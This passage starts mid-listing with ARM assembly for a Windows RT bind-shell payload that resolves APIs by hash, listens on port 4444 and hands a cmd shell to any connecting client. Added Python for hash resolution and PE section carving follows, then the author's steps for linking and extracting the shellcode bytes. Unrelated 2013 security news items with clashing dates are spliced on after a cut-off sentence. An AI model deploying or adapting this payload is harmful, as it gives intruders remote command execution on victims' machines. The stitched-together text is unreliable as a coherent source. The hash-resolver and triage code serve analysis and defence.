pop {r1-r11,pc} ; Restore stack and return to caller with the function address in R0
get_func_addr
ldr r3,[r5,#0x24] ; R3 = PIMAGE_EXPORT_DIRECTORY->AddressOfNameOrdinals
add r3,r3,r0,lsl #1
ldrh r2,[r3,r4] ; R2 = Ordinal table index
ldr r3,[r5,#0x1C] ; R3 = PIMAGE_EXPORT_DIRECTORY->AddressOfFunctions
add r3,r3,r2,lsl #2
ldr r3,[r3,r4] ; Function RVA
adds r0,r3,r4 ; R0 = Function VA
b exit_success

ExecutePayload
; Improvement: None of the calls to GetProcAddress
; validate that a valid address was actually returned
; Metasploit shellcode doesn't perform this validation either. :P
push {r4-r11,lr} ; Preserve registers on the stack
subw sp,sp,#0x214 ; Allocate space on the stack for local variables
movs r3,#0x44 ; sizeof(_STARTUPINFOA) - byte count for the zeroing loop below
add r2,sp,#0x38 ; R2 = &StartupInfo
movs r1,#0
init_mem1
; Improvement: I could just initialize everything on the stack to 0
strb r1,[r2],#1 ; Set current byte to 0
subs r3,#1
bne init_mem1
movs r3,#0x10 ; sizeof(_PROCESS_INFORMATION)
add r2,sp,#0x28 ; R2 = &ProcessInformation
init_mem2
strb r1,[r2],#1 ; Set current byte to 0
subs r3,#1
bne init_mem2

ldr r0,HASH_LoadLibraryA
bl GetProcAddress
mov r3,r0
adr r0,module_name ; &"ws2_32.dll"
blx r3 ; LoadLibraryA("ws2_32.dll");
ldr r0,HASH_WsaStartup
bl GetProcAddress
mov r4,r0
ldr r0,HASH_WsaSocketA
bl GetProcAddress
mov r5,r0
ldr r0,HASH_Bind
bl GetProcAddress
mov r6,r0
ldr r0,HASH_Listen
bl GetProcAddress
mov r7,r0
ldr r0,HASH_Accept
bl GetProcAddress
mov r8,r0
ldr r0,HASH_CloseSocket
bl GetProcAddress
mov r9,r0
ldr r0,HASH_CreateProcess
bl GetProcAddress
mov r10,r0
ldr r0,HASH_WaitForSingleObject
bl GetProcAddress
mov r11,r0
mov r0,#0x0202
add r1,sp,#0x80
blx r4 ; WSAStartup(MAKEWORD(2, 2), &WSAData);
movs r3,#0
movs r2,#0
movs r1,#1
movs r0,#2
str r3,[sp,#4]
str r3,[sp]
blx r5 ; s = WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
movs r3,#2 ; service.sin_family = AF_INET;
strh r3,[sp,#0x18]
movs r3,#0 ; service.sin_addr.s_addr = 0;
str r3,[sp,#0x1C]
mov r3,#0x5C11 ; service.sin_port = HTONS(4444);
movs r2,#0x10
add r1,sp,#0x18
strh r3,[sp,#0x1A]
mov r5,r0 ; WSASocketA returned socket (s)
blx r6 ; Bind( s, (SOCKADDR *) &service, sizeof(service) );
movs r1,#0
mov r0,r5
blx r7 ; Listen( s, 0 );
movs r2,#0
movs r1,#0
mov r0,r5
blx r8 ; AcceptedSocket = Accept( s, 0, 0 );
mov r4,r0
mov r0,r5
blx r9 ; CloseSocket( s ); Close the original socket
mov r3,#0x101 ; StartupInfo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
str r3,[sp,#0x64]
movs r3,#0x44 ; StartupInfo.cb = 68;
str r3,[sp,#0x38]
add r3,sp,#0x28
str r3,[sp,#0x14]
add r3,sp,#0x38
str r3,[sp,#0x10]
movs r3,#0
str r3,[sp,#0xC]
str r3,[sp,#8]
str r3,[sp,#4]
movs r3,#1
adr r1,cmdline ; &"cmd"
str r3,[sp]
movs r3,#0
movs r2,#0
movs r0,#0
str r4,[sp,#0x78] ; StartupInfo.hStdError = (HANDLE) AcceptedSocket;
str r4,[sp,#0x74] ; StartupInfo.hStdOutput = (HANDLE) AcceptedSocket;
str r4,[sp,#0x70] ; StartupInfo.hStdInput = (HANDLE) AcceptedSocket;
blx r10 ; CreateProcessA( 0, "cmd", 0, 0, TRUE, 0, 0, 0, &StartupInfo, &ProcessInformation );
ldr r0,[sp,#0x28]
mvn r1,#0
blx r11 ; WaitForSingleObject( ProcessInformation.hProcess, INFINITE );
addw sp,sp,#0x214
pop {r4-r11,pc}

HASH_WaitForSingleObject
DCD 0x601d8708
HASH_CreateProcess
DCD 0x863fcc79
HASH_CloseSocket
DCD 0x614d6e75
HASH_Accept
DCD 0xe13bec74
HASH_Listen
DCD 0xff38e9b7
HASH_Bind
DCD 0x6737dbc2
HASH_WsaSocketA
DCD 0xe0df0fea
HASH_WsaStartup
DCD 0x006b8029
HASH_LoadLibraryA
DCD 0x0726774c

cmdline
DCB "cmd", 0x0

module_name
DCB "ws2_32.dll", 0x0


END
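
The ROR-13 hashing that the GetProcAddress routine above performs is the same scheme as Metasploit's x86 block_api, which is why the constants in the DCD table can be looked up rather than guessed when a payload like this turns up in an incident. The following Python is an added example, not code from the original post: it reimplements the hash exactly as the assembly computes it (module name taken as the UTF-16LE bytes of BaseDllName including the terminating wide null, lower-case ASCII letters upper-cased by subtracting 0x20; export name as ASCII including its terminating null; every byte folded in after a 32-bit rotate right by 13) and then resolves hash constants back to (DLL, export) pairs against a candidate list. The constants are those from the DCD table on this page; the candidate export names are an assumption made for the example and can be replaced with any export table.

```python
"""Resolve ROR-13 API hashes of the kind used by the GetProcAddress routine above.

Added example (not part of the original post): reimplements the hash as the
assembly computes it and maps constants found in a payload back to API names.
"""

ROR_BITS = 13
MASK32 = 0xFFFFFFFF


def ror32(value, bits=ROR_BITS):
    """32-bit rotate right, the 'rors rX,rY,r10/r11' step in the assembly."""
    value &= MASK32
    return ((value >> bits) | (value << (32 - bits))) & MASK32


def module_hash(dll_name):
    """Hash of BaseDllName as the routine sees it in memory.

    The loader keeps the name as UTF-16LE in a UNICODE_STRING and the routine
    walks MaximumLength bytes, so the terminating wide null is hashed too.
    Bytes are loaded with ldrsb (signed), and anything >= 'a' has 0x20
    subtracted, which is how the routine upper-cases ASCII letters.
    """
    h = 0
    for b in (dll_name + "\x00").encode("utf-16-le"):
        sb = b - 0x100 if b & 0x80 else b      # ldrsb: sign-extend the byte
        h = ror32(h)
        if sb >= 0x61:                         # cmp r3,#0x61 / blt notlowercase
            sb -= 0x20
        h = (h + sb) & MASK32
    return h


def function_hash(func_name):
    """Hash of an export name: ASCII bytes including the terminating null."""
    h = 0
    for b in func_name.encode("ascii") + b"\x00":
        h = ror32(h)
        h = (h + b) & MASK32
    return h


def api_hash(dll_name, func_name):
    """Module hash + function hash, truncated to 32 bits (the 'adds r3,r2,r6' step)."""
    return (module_hash(dll_name) + function_hash(func_name)) & MASK32


# Candidate exports an analyst would try first. These lists are an assumption
# for this example; any export table can be substituted.
CANDIDATES = {
    "kernel32.dll": ["LoadLibraryA", "CreateProcessA", "WaitForSingleObject",
                     "VirtualAlloc", "ExitProcess", "GetProcAddress"],
    "ws2_32.dll": ["WSAStartup", "WSASocketA", "bind", "listen", "accept",
                   "closesocket", "connect", "recv", "send"],
}

# Constants copied from the DCD table of the payload above.
PAYLOAD_HASHES = [0x601d8708, 0x863fcc79, 0x614d6e75, 0xe13bec74,
                  0xff38e9b7, 0x6737dbc2, 0xe0df0fea, 0x006b8029, 0x0726774c]


def build_table(candidates=CANDIDATES):
    """Precompute hash -> (dll, export) for every candidate pair."""
    return {api_hash(dll, fn): (dll, fn)
            for dll, fns in candidates.items() for fn in fns}


def resolve(hashes, candidates=CANDIDATES):
    """Map each constant to its (dll, export) pair, or None when nothing matches."""
    table = build_table(candidates)
    return {h: table.get(h) for h in hashes}


if __name__ == "__main__":
    for h, name in resolve(PAYLOAD_HASHES).items():
        print("0x%08x -> %s" % (h, "%s!%s" % name if name else "unresolved"))
```

Because the loader's BaseDllName is UTF-16, feeding the module name as plain ASCII produces a different value; that is the usual reason a home-grown resolver fails to reproduce the well-known constants.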

You may have noticed that this shellcode is written in MASM format; therefore, it can only be assembled using armasm.exe (the ARM equivalent of ml.exe). Unfortunately, armasm doesn't provide the option of outputting a raw .bin file; it will only emit an object (.obj) file. I wrote Get-ObjDump with pulling out raw payload bytes in mind, but armasm doesn't apply relocations. This means that any calls to functions present in the payload won't be fixed up, and it will crash upon execution.

So rather than writing my own linker, the natural choice was to leverage Microsoft's linker, link.exe. In theory, all I would need to do is call `link bindshell.obj` and pull out the raw bytes from the '.foo' section of the resulting binary. However, I ran into a couple of issues in practice:

1. link.exe requires that you specify an entry point.

Solution: Easy. Provide the '/ENTRY:"main"' switch.

2. Depending on the subsystem you choose, link.exe requires certain functions in the CRT to be present. For example, these subsystems each require the following entry point function:

/SUBSYSTEM:CONSOLE - mainCRTStartup
/DLL - _DllMainCRTStartup
/SUBSYSTEM:WINDOWS - WinMainCRTStartup
/SUBSYSTEM:NATIVE - NtProcessStartup

Solution: Obviously, I don't care about the C runtime library in my shellcode. The solution I came up with was to specify EFI_APPLICATION as the subsystem since it doesn't require the CRT. In the end, I don't care about the type of PE file I output. I just need the linker to fix up relocations for me. I can take care of pulling out the bytes from the .foo section of the resulting executable. Fortunately, Get-PEHeader can rip raw bytes from a PE file.
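
Pulling the payload bytes out of the linked executable means reading the PE section table, the same header walk the GetProcAddress routine performs when it follows e_lfanew at offset 0x3C to the NT headers. As an added example (not the author's Get-PEHeader and not code from the original post), the Python below parses a PE32/PE32+ section table, carves a named section's raw file bytes, and additionally flags any section that is mapped both writable and executable, a check worth running on binaries during triage. The input is a minimal PE image constructed in the script itself (ARMNT machine type, one read-execute code section and one read-write-execute section), so it runs offline; the sample section content is just the Thumb encodings of push {r4,lr} and pop {r4,pc}, not a real payload.

```python
import struct

# Section characteristic flags from winnt.h
IMAGE_SCN_CNT_CODE = 0x00000020
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000

FILE_ALIGN = 0x200
IMAGE_FILE_MACHINE_ARMNT = 0x01C4


def parse_sections(image):
    """Walk IMAGE_DOS_HEADER -> IMAGE_NT_HEADERS -> section table and return
    one dict per section. Works for PE32 and PE32+ because the section table
    starts SizeOfOptionalHeader bytes past the optional header either way."""
    if image[:2] != b"MZ":
        raise ValueError("not a PE image: missing MZ signature")
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]   # same field the shellcode reads
    if image[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("not a PE image: missing PE signature")
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    machine, nsections, _, _, _, opt_size, _ = struct.unpack_from(
        "<HHIIIHH", image, e_lfanew + 4)
    opt_start = e_lfanew + 24
    magic = struct.unpack_from("<H", image, opt_start)[0]
    if magic not in (0x10B, 0x20B):                       # PE32 / PE32+
        raise ValueError("unexpected optional header magic 0x%x" % magic)
    table = opt_start + opt_size
    sections = []
    for i in range(nsections):
        # IMAGE_SECTION_HEADER is 40 bytes: Name[8], VirtualSize, VirtualAddress,
        # SizeOfRawData, PointerToRawData, PointerToRelocations, PointerToLinenumbers,
        # NumberOfRelocations, NumberOfLinenumbers, Characteristics
        (name, vsize, va, raw_size, raw_ptr, _, _, _, _, chars) = struct.unpack_from(
            "<8sIIIIIIHHI", image, table + 40 * i)
        sections.append({
            "name": name.rstrip(b"\x00").decode("ascii", "replace"),
            "virtual_size": vsize, "virtual_address": va,
            "raw_size": raw_size, "raw_ptr": raw_ptr,
            "characteristics": chars, "machine": machine,
        })
    return sections


def carve_section(image, name):
    """Return the raw file bytes of the named section (what the post pulls out of .foo)."""
    for s in parse_sections(image):
        if s["name"] == name:
            return bytes(image[s["raw_ptr"]:s["raw_ptr"] + s["raw_size"]])
    raise KeyError("no section named %r" % name)


def rwx_sections(image):
    """Names of sections mapped both writable and executable, a common triage flag."""
    both = IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE
    return [s["name"] for s in parse_sections(image)
            if s["characteristics"] & both == both]


def build_sample_image(sections):
    """Constructed minimal PE32 (ARMNT) carrying the given (name, data, characteristics)
    sections. Test input for the parser above only, not a loadable binary."""
    opt_size = 0xE0                                   # PE32 optional header size
    hdr = bytearray(b"MZ".ljust(0x3C, b"\x00"))
    hdr += struct.pack("<I", 0x40)                    # e_lfanew
    hdr += b"PE\x00\x00"
    hdr += struct.pack("<HHIIIHH", IMAGE_FILE_MACHINE_ARMNT, len(sections),
                       0, 0, 0, opt_size, 0x0102)     # EXECUTABLE_IMAGE | 32BIT_MACHINE
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)             # PE32 magic; other fields left zero
    hdr += opt
    raw_ptr, va, blobs = FILE_ALIGN, 0x1000, []
    for name, data, chars in sections:
        hdr += struct.pack("<8sIIIIIIHHI", name.encode("ascii").ljust(8, b"\x00"),
                           len(data), va, len(data), raw_ptr, 0, 0, 0, 0, chars)
        blobs.append((raw_ptr, data))
        raw_ptr += -(-len(data) // FILE_ALIGN) * FILE_ALIGN   # round up to file alignment
        va += 0x1000
    image = bytearray(raw_ptr)
    image[:len(hdr)] = hdr
    for ptr, data in blobs:
        image[ptr:ptr + len(data)] = data
    return bytes(image)


# Constructed sample content: Thumb encodings of 'push {r4,lr}' and 'pop {r4,pc}'.
SAMPLE_CODE = b"\x10\xb5\x10\xbd"
SAMPLE_IMAGE = build_sample_image([
    (".foo", SAMPLE_CODE, IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_READ),
    (".rwx", b"\x00" * 16, IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE),
])

if __name__ == "__main__":
    for s in parse_sections(SAMPLE_IMAGE):
        print("%-8s raw@0x%x size=%d chars=0x%08x"
              % (s["name"], s["raw_ptr"], s["raw_size"], s["characteristics"]))
    print("carved .foo:", carve_section(SAMPLE_IMAGE, ".foo").hex())
    print("RWX sections:", rwx_sections(SAMPLE_IMAGE))
```

On a real linked file the same call, carve_section(open(path, "rb").read(), ".foo"), returns the section's raw bytes; the RWX check is the part to keep in a triage script, since a section that is both writable and executable is a poor sign in anything that is not a deliberately hand-built test image.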
 
Wrapping things up, here is the process of obtaining fully-functioning ARM-based Windows RT shellcode from end to end:

29 Jul 13:02

One of the world's most famous hackers has died

It is not known what caused the death of 35-year-old Barnaby Jack. He was a genius in his field.
22 Jul 15:15

Ibrahim Balic takes credit for Apple Dev Centre “attack”, but will he shoulder the blame?

by Paul Ducklin
The Apple Dev Centre data breach has taken an intriguing turn, with a self-styled security researcher calling himself Ibrahim Balic taking the credit. He's even made a video showing what he did. But will he end up shouldering the blame? Tell us what you think...
22 Jul 14:09

British Prime Minister Promises Default On Porn Blocking

by samzenpus
judgecorp writes "David Cameron, the British Prime Minister has promised that the UK's ISPs will be required to provide connections with 'porn blocking' filters switched on by default. The public promise comes despite opposition from ISPs, and the near-universal acknowledgment that the system wouldn't work. Last week also saw the leak of a letter from the Department for Education which effectively told ISPs to lie — to implement their preferred 'active choice' system, and simply call it 'default-on'."

22 Jul 07:32

MI5 Hiring Industrial Espionage IT Support Staff

by Soulskill
AmiMoJo writes "A recent job posting by MI5 seeks to recruit 'Data Exploitation Specialists.' The core of the role is described as 'provid[ing] tactical solutions and operational support to business users of information exploitation systems.' In other words, industrial espionage. This open admission comes at a time when the UK and its partners are accusing China of the same thing. Pot, meet kettle?"


22 Jul 07:31

Security incident on Ubuntu Forums

by trey

Ubuntu Forums is currently unavailable. A notice on the website says that the service was attacked and has therefore been shut down. Canonical's infrastructure team has begun restoring the service.

The attackers not only defaced the vBulletin-based forum but also made off with the usernames, passwords and e-mail addresses of nearly 2 million registered users. The passwords were not stored in plain text. Even so, anyone who used the same password on Ubuntu Forums and elsewhere should change it on those other sites as soon as possible. Ubuntu One, Launchpad and other Ubuntu/Canonical services are not affected by the incident.

Details are in the announcement.

22 Jul 07:31

Ubuntu Forums Security Breach, (Wed, Jul 31st)

Ubuntu forums are currently down because they have been breached. According to their post, &qu ...(more)...

22 Jul 07:30

Apple: Developer Site Targeted In Security Attack, Still Down

by samzenpus
An anonymous reader writes "Apple has informed developers that an intruder gained access to its developer site database. Quoted email from Apple: 'Last Thursday, an intruder attempted to secure personal information of our registered developers from our developer website. Sensitive personal information was encrypted and cannot be accessed, however, we have not been able to rule out the possibility that some developers' names, mailing addresses, and/or email addresses may have been accessed. In the spirit of transparency, we want to inform you of the issue. We took the site down immediately on Thursday and have been working around the clock since then. In order to prevent a security threat like this from happening again, we're completely overhauling our developer systems, updating our server software, and rebuilding our entire database. We apologize for the significant inconvenience that our downtime has caused you and we expect to have the developer website up again soon.'"
